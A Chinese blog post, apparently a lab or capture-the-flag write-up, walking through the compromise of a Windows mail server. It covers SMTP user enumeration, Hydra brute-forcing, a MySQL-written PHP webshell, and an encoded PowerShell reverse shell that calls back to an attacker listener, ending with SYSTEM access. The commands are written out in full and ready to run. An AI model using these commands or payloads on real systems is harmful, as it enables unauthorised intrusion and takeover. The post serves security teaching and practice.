文章总结: 本文详细介绍了对邮件服务器的渗透测试过程,包括端口扫描、SMTP服务用户名枚举和密码破解、MySQL利用、webshell写入和反向shell获取等步骤。攻击者通过smtp-user-enum工具发现有效用户名,使用Hydra破解密码,利用MySQL的secure_file_priv配置漏洞写入webshell,最终通过PowerShell获取服务器的SYSTEM权限。文章提供了具体的命令和截图,展示了完整的渗透测试流程。
综合评分: 82
文章分类: 渗透测试,WEB安全,内网渗透,红队,漏洞分析
邮件服务器渗透
原创
JZhoucdc
攻防之路JZhoucdc
2025年7月31日 12:05
四川
我们的任务是审查这台服务器中的安全性,并向客户汇报。根据得到的信息,该服务器是一台管理电子邮件、客户及其文件的服务器。
1.端口枚举
nmap -Pn -sV -T4 10.129.192.255
发现多个端口开启,这里因为该服务器是一台管理电子邮件,尝试针对smtp服务进行爆破
2.攻击SMTP
尝试枚举用户名,可以使用三种方法,VRFY,EXPN,RCPT TO。
VRFY命令用于验证特定的邮箱是否存在于邮件服务器中。当客户端发送一个``VRFY请求时,服务器会返回该邮箱是否有效的响应。
EXPN命令用于扩展邮件列表,通常用于验证邮件组中的成员。当客户端发送``EXPN 请求时,服务器会返回该邮件组的所有成员。
RCPT TO命令是SMTP会话中的一个常规命令,通常用于指定邮件的收件人。在用户名枚举攻击中,攻击者可以利用``RCPT TO发送邮件请求,并根据服务器的响应来判断用户名是否有效。
smtp-user-enum -M RCPT -U ./name -D inlanefreight.htb -t 10.129.192.255
发现用户名,由于目前服务器只开放了SMTP服务,尝试破解密码
3.Hydra密码破解
hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt -f 10.129.192.255 smtp
得到了一组用户凭证
4.Mysql利用
mysql -u [email protected] -p -h 10.129.192.255 --ssl=FALSE
尝试枚举数据库,经过简单的枚举,并没有发现敏感数据。
因为该服务器开启了http端口,我们可以尝试写入webshell,然后通过网页访问。写入webshell,需要知道绝对路径,还有系统全局变量secure_file_priv。
进入网页主页,发现是一个XAMPP的默认界面,页面暴露了PHPINFO入口
暴露PHPinfo入口允许攻击者轻松访问有关服务器和应用程序的详细配置信息。
发现绝对路径。下一步,在MySQL中,secure_file_priv 是一个配置选项,用于限制数据库服务器 导入 和 导出 数据文件的路径。通过设置 secure_file_priv,MySQL 服务器管理员可以指定一个特定的目录作为文件读写的唯一合法路径,防止数据文件被写入到不安全或不希望的地方。
show variables like "secure_file_priv";
可以看见secure_file_priv 被设置为空,则可以允许 MySQL 在任何位置执行文件导入或导出命令。这使得攻击者更容易将文件写入 Web 根目录,从而执行 WebShell 脚本。
SELECT "<?php echo shell_exec($_GET['0']);?>" INTO OUTFILE 'C:\\xampp\\htdocs\\webshell.php';
尝试写入一个webshell,然后可以我们可以访问
curl http://10.129.192.255/webshell.php?0=whoami
成功执行了命令whoami
5.拿到一个反向shell
通过PowerShell在目标机器上执行恶意命令并获取一个反向连接。
通过netcat监听443端口
rlwrap nc -lvnp 443
curl http://10.129.192.255/webshell.php?0=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA4ADMAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
成功拿到一个shell,并且是SYSTEM权限。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:攻防之路JZhoucdc JZhoucdc《邮件服务器渗透》